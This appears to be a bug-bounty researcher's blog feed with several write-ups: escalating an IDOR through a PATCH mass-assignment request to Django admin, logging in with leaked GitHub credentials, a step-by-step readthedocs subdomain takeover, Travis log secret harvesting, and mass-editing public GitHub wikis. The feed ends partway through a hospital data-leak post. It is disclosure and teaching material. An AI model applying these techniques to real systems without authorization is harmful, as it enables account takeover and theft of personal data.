tag:blogger.com,1999:blog-4999111958303936832024-03-13T08:36:36.473+05:30Shashank's Security BlogFinding security bugs for food.Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.comBlogger21125tag:blogger.com,1999:blog-499911195830393683.post-22957943215852833242020-11-03T20:31:00.003+05:302020-11-03T20:32:49.793+05:30From a 500 error to Django admin takeover <p>This bug is about a private target I was hunting. I passed all the subdomains to <a href="https://github.com/ffuf/ffuf" rel="nofollow" target="_blank">FFUF</a>, a great tool written in GoLang to brute force directories. </p><p>Since there were no interesting 200 responses against my wordlist. I started checking other responses like 302, 403, etc. </p><p>I noticed one of the subdomains (let that be sub.vulnerable.com) gave a 500 error for the endpoint </p><p>/api-docs/</p><p><br /></p><p>This was interesting because when tried an endpoint /anything, it returned 404. So I was quite sure that /api-docs existed but needs more privileges or something like that...</p><p>I tried lots of methods, but nothing worked. So I just went back to test the main application. I signed up, and I had an intuition to refresh the page in the next tab, which was /api-docs/</p><p>PFFF, to my surprise, I could see the API docs now, which was a swagger UI. </p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-lR3xEV-EFhk/X34W4BuECUI/AAAAAAAAEnk/nnzRSYNB-tI9HeadRjnUqmEzfYo_aMWpwCLcBGAsYHQ/s2874/Screenshot%2B2020-10-08%2Bat%2B12.58.17%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="484" data-original-width="2874" height="108" src="https://1.bp.blogspot.com/-lR3xEV-EFhk/X34W4BuECUI/AAAAAAAAEnk/nnzRSYNB-tI9HeadRjnUqmEzfYo_aMWpwCLcBGAsYHQ/w640-h108/Screenshot%2B2020-10-08%2Bat%2B12.58.17%2BAM.png" width="640" /></a></div><br /><p>I after seeing the admin-api, I thought I had hit a goldmine. But that was not the case. None of the admin-API's were working. So I started looking at the normal API endpoints. </p><p><br /></p><p>Two of the endpoints were interesting:</p><p>1. /api/panel/v1/users/{id}/</p><p>Where the {id} value is an integral value. I automated the request for 1 to 100 numerical values, and I was able to fetch other user's email addresses, DOB, name, etc. by filtering all 200 responses.</p><p><br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-6GxjmLy7WK4/X34Y4Hxr5KI/AAAAAAAAEnw/4X-5f2-WmPsp_HMHMY7uWjezpQzDCzlGQCLcBGAsYHQ/s1676/Screenshot%2B2020-10-08%2Bat%2B1.06.49%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="1676" height="190" src="https://1.bp.blogspot.com/-6GxjmLy7WK4/X34Y4Hxr5KI/AAAAAAAAEnw/4X-5f2-WmPsp_HMHMY7uWjezpQzDCzlGQCLcBGAsYHQ/w640-h190/Screenshot%2B2020-10-08%2Bat%2B1.06.49%2BAM.png" width="640" /></a></div><br /> 2. A similar endpoint and similar leak with search functionality<p></p><p></p><blockquote>/api/panel/v1/users/?page=1&page_size=1&search=cyberboy</blockquote><p></p><p><br /></p><p>I reported the bug, and the team asked me if I could raise the severity. </p><p>Challenge accepted!</p><p><br /></p><p>I started digging the endpoint again /api/panel/v1/users/{id}/</p><p>and notice a JSON value in response "<span style="orphans: 2; white-space: pre-wrap; widows: 2;">is_staff:false</span>"</p><p>So it is pretty easy to guess that there are different roles for the website. I wanted to know more about the roles, so I thought of looking at the admin account's privileges, and they would-be some developers of the company. It was easy to find the developers' names in public places and then pass the name to the search API and fetch their data if I get lucky.</p><p>So when I did this, one of the names worked, and I got an admin account information.</p><p></p><blockquote>/api/panel/v1/users/?page=1&page_size=1&search=NAME_OF_A_DEV_I_KNEW</blockquote><p></p><p><br /></p><p>Now I have a few more interesting roles. </p><p></p><blockquote><p>"is_superuser":true</p><p>"is_staff":true</p><p>"lms_role":"super_admin"</p></blockquote><p></p><div><br /></div><div>But again, how do I access an admin account. I tried and failed. So I thought, what if I am modified to these privileges. The first thing I tried was making a POST request with the above JSON value to my own ID</div><div><br /></div><div><br /></div><div><div></div><blockquote><div></div><blockquote><div>POST /api/panel/v1/users/{id}/ HTTP/1.1</div><div><br /></div><div>{</div><div><span class="Apple-tab-span" style="white-space: pre;"> </span>"is_superuser":true</div><div><span class="Apple-tab-span" style="white-space: pre;"> </span>"is_staff":true</div><div><span class="Apple-tab-span" style="white-space: pre;"> </span>"lms_role":"super_admin"</div><div>}</div></blockquote><div></div></blockquote><div></div></div><div><br /></div><div>Unfortunately, a 500 error.</div><div><br /></div><div>The next thing would be to try the PATCH method. </div><div><br /></div><div><div></div><blockquote><div></div><blockquote><div>PATCH /api/panel/v1/users/{id}/ HTTP/1.1</div><div><br /></div><div>{</div><div><span class="Apple-tab-span" style="white-space: pre;"> </span>"is_superuser":true</div><div><span class="Apple-tab-span" style="white-space: pre;"> </span>"is_staff":true</div><div><span class="Apple-tab-span" style="white-space: pre;"> </span>"lms_role":"super_admin"</div><div>}</div></blockquote><div></div></blockquote><div></div></div><div><br /></div><div>I got 200, okay. </div><div><br /></div><div>I logged into my account, and I was a staff and a superuser who could edit and modify contents. </div><div><br /></div><div>My curiosity did not stop so, I searched for "lms_role" turns out; it's a learning management system and had something to do with Django. So I just opened /admin. And I was greeted with welcome "Cyberboy."</div><div><br /></div><div>Here we go.. I am the admin now :)</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-yMP3i5kyPrI/X34csHKOPwI/AAAAAAAAEn8/_Jy-GUPLSBUy51Gr5i8dif4Wc1X8cxjYQCLcBGAsYHQ/s2558/Screenshot%2B2020-10-08%2Bat%2B1.22.59%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="228" data-original-width="2558" height="58" src="https://1.bp.blogspot.com/-yMP3i5kyPrI/X34csHKOPwI/AAAAAAAAEn8/_Jy-GUPLSBUy51Gr5i8dif4Wc1X8cxjYQCLcBGAsYHQ/w640-h58/Screenshot%2B2020-10-08%2Bat%2B1.22.59%2BAM.png" width="640" /></a></div><br /><div><br /></div><div>Mission accomplished!</div><div>I informed the team that I would like to stop here, and they agreed. </div><div><br /></div><div>Bounty reward 3000$</div><div><br /></div><pre style="font-variant-ligatures: normal; orphans: 2; overflow-wrap: break-word; white-space: pre-wrap; widows: 2;"><br /></pre><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p>Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com4tag:blogger.com,1999:blog-499911195830393683.post-46932540851770020902020-08-18T21:32:00.012+05:302020-08-18T21:59:05.313+05:30Escalating a GitHub leak to takeover entire organization I was hunting on a private program. One of the common things I do is look for leaked credentials on Github. I give special attention to deleted files. Because many people are not aware that just deleting a file doesn't remove it from your repository. <div><br /></div><div>One of the YAML files caught my attention. <p><span style="background-color: white;"><br /></span></p><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"></div><blockquote>data:<br /> matrixbot-username: {{ .Values.matrixbot.username | default "some_leaked_username" | b64enc }}<br /> matrixbot-password: {{ .Values.matrixbot.password | default "some_leaked_password" | b64enc }}</blockquote><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div>Initially, I had no clue what were these passwords. So I started searching about the matrix thing. <br />I stumbled upon https://matrix.org and realized this is a communication client. <div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><blockquote>Matrix is an open-source project that publishes the Matrix open standard for secure, decentralized, real-time communication, and its Apache-licensed reference implementations.</blockquote><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34);"><div style="caret-color: rgb(34, 34, 34);">So, here's the plan. Find the client and try to log in and see if I was lucky enough. I found a web-based client at https://app.element.io/#/login attempted to log in, but it didn't work. <div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div>I almost gave up, but then I noticed that there is an option to have a self-hosted server. And it somehow summed up my theory that a DevOps person might have used it for some automation, so there was a YAML file, and hence it should be self-hosted.<div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div>Now I had to find the hosted server. And the most obvious step was to look for subdomains. <br />There were multiple subdomains, and, one that caught my attention was matrix.thewebsite.com<div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div>Visting the URL showed this, which was very convincing I am at the right place. </div></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-A-S86-Sw0ZU/Xzv2ylOEV_I/AAAAAAAAElc/ATOKQMceYdAu9pt9UB7gdNpwRQxDK83GQCLcBGAsYHQ/s1500/matrix.png" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: black;"><img border="0" data-original-height="1060" data-original-width="1500" src="https://1.bp.blogspot.com/-A-S86-Sw0ZU/Xzv2ylOEV_I/AAAAAAAAElc/ATOKQMceYdAu9pt9UB7gdNpwRQxDK83GQCLcBGAsYHQ/s640/matrix.png" width="640" /></span></a></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div>So, I visited https://app.element.io/#/login again. Added the custom server. Entered the leaked username and password. To my surprise, I was in. <div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-GnyYPcpp9Pk/Xzv45-Ee5dI/AAAAAAAAElo/KpxEIkWboNsNfn8XXO8PK16YO8W7snqpACLcBGAsYHQ/s2112/matrix3.png" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: black;"><img border="0" data-original-height="294" data-original-width="2112" src="https://1.bp.blogspot.com/-GnyYPcpp9Pk/Xzv45-Ee5dI/AAAAAAAAElo/KpxEIkWboNsNfn8XXO8PK16YO8W7snqpACLcBGAsYHQ/s640/matrix3.png" width="640" /></span></a></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div>As I logged in, I understood the creds were of a matrix bot. There was a hell lot of information like Grafana passwords, server logs, private keys, etc. in channel description itself. However, I immediately logged out and filed a report. <div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div>Reward 4000$<div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><br /><br />Takeaway for hackers:<br />- Do not give up or conclude too early. Try and research more. <br />- Try to escalate leaks but with caution. Do not go very deep.<div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div>Takeaway for companies:<br />- Purge the files just deleting a file doesn't work.<br />- Implement 2FA for all accounts.<div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div>Timeline:<br />7th Aug: Filed the report.<br />7th Aug: Bug was fixed by removing the file as well as refreshing the credentials. Additionally, 2FA was implemented.<br />11th Aug: 4000$ bounty reward. <div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); font-family: arial, helvetica, sans-serif;"><span style="background-color: white;"><br /></span></div><div style="caret-color: rgb(34, 34, 34); color: #222222; font-family: arial, helvetica, sans-serif;"><br /></div></div>Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-68670707578185149312020-07-21T04:45:00.007+05:302020-07-21T04:50:31.241+05:30Subdomain Takeover using readthedocs <div dir="ltr" style="text-align: left;" trbidi="on">
Hello World!<br />
<br />
Not a fancy blog post, but I just discovered that subdomain takeover is possible for "readthedocs."<br />
<br />
What is a subdomain takeover?<br />
It is best explained here. <a href="https://github.com/EdOverflow/can-i-take-over-xyz">https://github.com/EdOverflow/can-i-take-over-xyz</a><br />
<br />
What is "readthedocs"?<br />
Read the Docs is an open-sourced free software documentation hosting platform. It generates documentation written with the Sphinx documentation generator.<br />
<br />
How do I check for subdomain takeover over?<br />
<br />
Any subdomain pointing to "readthedocs" but not claimed would throw an error like in the screenshot below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-GHC2YYbH3-s/XxYiwVer2zI/AAAAAAAAEj8/QdAw3yFuWLIgcyHYIYwkzPm_3K_x2wYXACLcBGAsYHQ/s1600/Screenshot%2B2020-07-21%2Bat%2B4.20.45%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="660" data-original-width="1600" height="264" src="https://1.bp.blogspot.com/-GHC2YYbH3-s/XxYiwVer2zI/AAAAAAAAEj8/QdAw3yFuWLIgcyHYIYwkzPm_3K_x2wYXACLcBGAsYHQ/s640/Screenshot%2B2020-07-21%2Bat%2B4.20.45%2BAM.png" width="640" /></a></div>
<br />
<br />
<br />
How to takeover?<br />
1. Signup at <a href="https://readthedocs.org/">https://readthedocs.org</a> and click on Admin settings<br />
2. Add the repository <a href="https://github.com/readthedocs/template.git">https://github.com/readthedocs/template.git</a> or fork the repository if you wish to make any changes.<br />
3. Add your repository at "Repository URL:"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-4HnwjaVmvVg/XxYkHt2Te6I/AAAAAAAAEkI/vOS-l6btProueM8dHgEddhF_OCJugbgGACLcBGAsYHQ/s1600/Screenshot%2B2020-07-21%2Bat%2B4.38.55%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1108" data-original-width="1600" height="441" src="https://1.bp.blogspot.com/-4HnwjaVmvVg/XxYkHt2Te6I/AAAAAAAAEkI/vOS-l6btProueM8dHgEddhF_OCJugbgGACLcBGAsYHQ/s640/Screenshot%2B2020-07-21%2Bat%2B4.38.55%2BAM.png" width="640" /></a></div>
<br />
<br />
4. Click on "Domains" in admin settings and add the domain.<br />
<br />
<br />
<br />
<br />
Takeover!<br />
<br />
P.S I wrote this blog because I didn't find it mentioned at <a href="https://github.com/EdOverflow/can-i-take-over-xyz">https://github.com/EdOverflow/can-i-take-over-xyz</a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com1tag:blogger.com,1999:blog-499911195830393683.post-18475965389120810982019-05-18T21:26:00.000+05:302019-08-17T15:43:50.191+05:30Finding leaks in Travis logs- an automated approach<div dir="ltr" style="text-align: left;" trbidi="on">
First of all, I would like to give credits to original researchers who highlighted this issue into the public.<br />
The original blog post can be accessed through this link<br />
<a href="https://edoverflow.com/2019/ci-knew-there-would-be-bugs-here/">https://edoverflow.com/2019/ci-knew-there-would-be-bugs-here/</a><br />
<br />
I used their concepts to write a tool which automates the entire process and finds out potential leaks.<br />
The tool can be found here.<br />
<a href="https://github.com/Shashank-In/TravisLeaks"><b>https://github.com/Shashank-In/TravisLeaks</b></a><br />
<br />
What is Travis?<br />
Travis CI is a hosted continuous integration service used to build and test software projects hosted at GitHub.<br />
<br />
According to Travis for open source projects, they can be used for free, but the entire Travis log remains public. This opens a door for malicious hackers to harvest sensitive API keys, passwords, etc. of the organization having public Travis logs.<br />
<br />
Travis, in 2015, acknowledged that their API is being misused to find sensitive keys. They also started hiding potentially sensitive data in Travis logs by replacing them with the [secure]. But the question was, it enough?<br />
<br />
Now Ed in his research already listed common keywords in Travis logs which could potentially leak some sensitive data. But while looking for those keywords, I realized most of them got replaced with [secure] by Travis. It seems like Travis hides sensitive data based on some whitelisted keywords.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-QqD9os5JMSQ/XOAnBvlL6iI/AAAAAAAAEXw/4KzS5cgOmhwBQybYfKEs5-Zj6LxPrsFbACLcBGAs/s1600/Screenshot%2B2019-05-18%2Bat%2B21.08.11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="466" data-original-width="1300" height="227" src="https://4.bp.blogspot.com/-QqD9os5JMSQ/XOAnBvlL6iI/AAAAAAAAEXw/4KzS5cgOmhwBQybYfKEs5-Zj6LxPrsFbACLcBGAs/s640/Screenshot%2B2019-05-18%2Bat%2B21.08.11.png" width="640" /></a></div>
<br />
<br />
So the plan was to look for keywords based on Ed's list and additionally use the concept of entropy to find possible API keys. This seemed to be the right solution because it was not easy to figure out more potential keywords.<br />
<br />
Example GITHUB_TOKEN is perhaps blacklisted as can be seen above. What if the variable is TSD_GITHUB_TOKEN? Difficult to guess, but if we use the concept of entropy, we can find the possible leak.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-ZpwzybeCkZw/XOAoTNtxy1I/AAAAAAAAEX4/1QB49JJlkIgB-hre4_qnpfddalGVsRr4ACLcBGAs/s1600/Screenshot%2B2019-05-18%2Bat%2B21.06.44.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="342" data-original-width="1600" height="136" src="https://2.bp.blogspot.com/-ZpwzybeCkZw/XOAoTNtxy1I/AAAAAAAAEX4/1QB49JJlkIgB-hre4_qnpfddalGVsRr4ACLcBGAs/s640/Screenshot%2B2019-05-18%2Bat%2B21.06.44.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com2tag:blogger.com,1999:blog-499911195830393683.post-73836316188294011192019-03-13T00:36:00.000+05:302019-08-17T15:04:25.907+05:30Taking Over Publicly Editable Github Wiki in Masses <div dir="ltr" style="text-align: left;" trbidi="on">
Let's get familiar with a few things first!<br />
<br />
What is Github?<br />
GitHub is a web-based hosting service for version control using Git. Github is quite popular for its efficient service and hence all big companies like Google, Facebook, Microsoft, etc. use it for their open-source projects.<br />
<br />
Any GitHub repository has a "wiki" page. The "wiki" page is generally used for documentation, installation instructions, etc.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-LR9mKNvzzNQ/XGMTKcQ8KZI/AAAAAAAAET4/CoixdZHg15Mb9uc8e4TTqwjkb4HP9Y-twCLcBGAs/s1600/Screenshot%2B2019-02-13%2Bat%2B00.10.06.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="443" data-original-width="1600" height="177" src="https://1.bp.blogspot.com/-LR9mKNvzzNQ/XGMTKcQ8KZI/AAAAAAAAET4/CoixdZHg15Mb9uc8e4TTqwjkb4HP9Y-twCLcBGAs/s640/Screenshot%2B2019-02-13%2Bat%2B00.10.06.png" width="640" /></a></div>
<br />
<br />
<br />
With certain settings, an Organisation or a user can allow any other user (who is not a collaborator) to edit the "wiki" page. According to me, this is absolutely a bad option to be enabled.<br />
<br />
If not appropriately observed a malicious user can edit or publish a "wiki" page on a company's official Github repository and mislead the community or user's following the repo. to download or install malware, vulnerable libraries, etc.<br />
<br />
This vulnerability can be an excellent catalyst for malicious hackers who infect users through typosquatted malicious libraries hosted by them. An innocent user will apparently follow the wiki instructions blindly especially if the wiki is hosted on a popular organization's Github repo.<br />
<br />
This is in general considered as a low priority security issue. But let's look at a bigger picture.<br />
<br />
According to Github, there are around 96 Million repos. and 2.1 Million organization. Even with a success rate of 0.1%, an attacker can publish malicious content on 96,000 wiki pages on Github.<br />
<br />
<br />
I wrote a simple tool in python using selenium which will take an organization's Github username as input, then iterate through all the repositories under that organization to find "publicly editable wiki" and then publish a sample wiki page on it as well as return the page URL.<br />
<br />
Please find the codes on my Github<br />
<a href="https://github.com/Shashank-In/VulEdiWi">https://github.com/Shashank-In/VulEdiWi</a><br />
<br />
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/-fpSCtjE34o" width="560"></iframe><br />
<br />
<br />
I scanned popular organization's Github and following was the result:-<br />
<br />
<b>Google (https://github.com/google)</b><br />
<br />
<b>168 out of 1420 repositories had publicly editable wikis.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-_cC-QXrUuKU/XGMqZozGM9I/AAAAAAAAEUE/-KWexbMQkscOIR67l-S7dvMgQpP7MTMtACLcBGAs/s1600/Screenshot%2B2019-02-13%2Bat%2B01.49.26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="784" data-original-width="1404" height="356" src="https://2.bp.blogspot.com/-_cC-QXrUuKU/XGMqZozGM9I/AAAAAAAAEUE/-KWexbMQkscOIR67l-S7dvMgQpP7MTMtACLcBGAs/s640/Screenshot%2B2019-02-13%2Bat%2B01.49.26.png" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-LaLf9ke6TD0/XGMvSzXJNXI/AAAAAAAAEUk/x6FxS_efBN0Tl2ru4Hy9ORjl4r5dal-zACLcBGAs/s1600/Screenshot%2B2019-02-13%2Bat%2B02.10.13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="775" data-original-width="1600" height="308" src="https://3.bp.blogspot.com/-LaLf9ke6TD0/XGMvSzXJNXI/AAAAAAAAEUk/x6FxS_efBN0Tl2ru4Hy9ORjl4r5dal-zACLcBGAs/s640/Screenshot%2B2019-02-13%2Bat%2B02.10.13.png" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<b>Facebook (https://github.com/facebook)</b><br />
<b><br />
</b> <b>1 out of 162 repositories had publicly editable wikis.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-9QdekxVZjQE/XGMr2LqnkXI/AAAAAAAAEUY/tNwucifdvAArGp_3c5WFDjno8YEhVm40QCLcBGAs/s1600/Screenshot%2B2019-02-13%2Bat%2B01.55.30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="945" data-original-width="1600" height="378" src="https://1.bp.blogspot.com/-9QdekxVZjQE/XGMr2LqnkXI/AAAAAAAAEUY/tNwucifdvAArGp_3c5WFDjno8YEhVm40QCLcBGAs/s640/Screenshot%2B2019-02-13%2Bat%2B01.55.30.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<b>Alibaba (https://github.com/alibaba)</b><br />
<b><br />
</b> <b>38 out of 246 repositories had publicly editable wikis.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-h8vTUk0gdqQ/XGMwDfW8-tI/AAAAAAAAEUs/9nnhlnAqSF4LSGySObuZ1w6sCu8KrJvrQCLcBGAs/s1600/Screenshot%2B2019-02-13%2Bat%2B02.01.40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="968" data-original-width="1600" height="386" src="https://2.bp.blogspot.com/-h8vTUk0gdqQ/XGMwDfW8-tI/AAAAAAAAEUs/9nnhlnAqSF4LSGySObuZ1w6sCu8KrJvrQCLcBGAs/s640/Screenshot%2B2019-02-13%2Bat%2B02.01.40.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<b>Microsoft (https://github.com/Microsoft)</b><br />
<b><br />
</b> <b>364 out of 2251 had publicly editable wikis</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-6EBJc0MEz70/XG8PUJyObFI/AAAAAAAAEVk/EYFOkH-7lXU66s8umG9sLU2HNcfGsEmSACLcBGAs/s1600/Screenshot%2B2019-02-22%2Bat%2B02.20.38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1010" data-original-width="1600" height="402" src="https://4.bp.blogspot.com/-6EBJc0MEz70/XG8PUJyObFI/AAAAAAAAEVk/EYFOkH-7lXU66s8umG9sLU2HNcfGsEmSACLcBGAs/s640/Screenshot%2B2019-02-22%2Bat%2B02.20.38.png" width="640" /></a></div>
<br />
<br />
<b>Mozilla (https://github.com/mozilla)</b><br />
<b>792 out of 1960 had publicly editable wikis</b><br />
<b><br />
</b> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Ayl7d5kP55c/XG8Q4Xhb6MI/AAAAAAAAEVw/5SCRxKr0cREAI1AmDtaF8PuHV-3zw23IwCLcBGAs/s1600/Screenshot%2B2019-02-22%2Bat%2B02.27.52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="493" data-original-width="1600" height="196" src="https://3.bp.blogspot.com/-Ayl7d5kP55c/XG8Q4Xhb6MI/AAAAAAAAEVw/5SCRxKr0cREAI1AmDtaF8PuHV-3zw23IwCLcBGAs/s640/Screenshot%2B2019-02-22%2Bat%2B02.27.52.png" width="640" /></a></div>
<b><br />
</b> <b><br />
</b> <b><br />
</b> </div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com2tag:blogger.com,1999:blog-499911195830393683.post-72025452564120968562018-03-17T03:44:00.003+05:302019-08-17T15:07:21.421+05:30How Apollo Hospitals leaked 1 million customer details<div dir="ltr" style="text-align: left;" trbidi="on">
About Apollo Hospitals:-<br />
<br />
In 2015, Apollo Hospitals introduced its digital platform, Ask Apollo. The platform provides remote healthcare services. The platform connects patients with doctors remotely and provides services like a consultation with doctors via video, voice calls, and email. Apollo developed the platform in partnership with the Hyderabad-based emergency and healthcare management services firm, HealthNet Global and Vidyo<br />
source: Wikipedia<br />
<br />
I stumbled on this bug while I was booking a dental appointment with Apollo hospitals. This bug was leaking 1 MILLION customers details who booked an appoint online with apollo hospitals.<br />
<br />
Since they are a big company, I thought it was my moral responsibility to help them get it fixed. But unfortunately, they never replied to my emails.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-H0k8Hc8W6Kc/Wqw5zSnOe6I/AAAAAAAADy8/xDPb46uzhBUnrNhljFFc3GWpThJyqJTxQCLcBGAs/s1600/Screen%2BShot%2B2018-03-17%2Bat%2B3.08.20%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="548" data-original-width="1446" height="242" src="https://2.bp.blogspot.com/-H0k8Hc8W6Kc/Wqw5zSnOe6I/AAAAAAAADy8/xDPb46uzhBUnrNhljFFc3GWpThJyqJTxQCLcBGAs/s640/Screen%2BShot%2B2018-03-17%2Bat%2B3.08.20%2BAM.png" width="640" /></a></div>
<br />
<br />
Then one day I heard of a nice guy named Elliot. Who disclosed a lot of vulnerabilities in Indian companies privately and helped them get it patched. So, I asked him if he could contact because he had more chances of getting a response.<br />
<br />
And that worked. I am glad that apollo patched the vulnerability. But I wish like other companies they had a responsible disclosure program through which anyone could help them patch security issues in an ethical manner.<br />
<br />
Details of the security issue:-<br />
<br />
So Apollo Hospitals has an online appointment booking portal "www.askapollo.com" .<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-0SltCC0iKwQ/WqWlwaAPPYI/AAAAAAAADyI/oS_JD6hpBKEsTEXBpZggEncG1WSiE9wIQCLcBGAs/s1600/Screen%2BShot%2B2018-03-12%2Bat%2B3.24.31%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1600" height="297" src="https://2.bp.blogspot.com/-0SltCC0iKwQ/WqWlwaAPPYI/AAAAAAAADyI/oS_JD6hpBKEsTEXBpZggEncG1WSiE9wIQCLcBGAs/s640/Screen%2BShot%2B2018-03-12%2Bat%2B3.24.31%2BAM.png" width="640" /></a></div>
<br />
<br />
When we sign up, we get our profile created.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
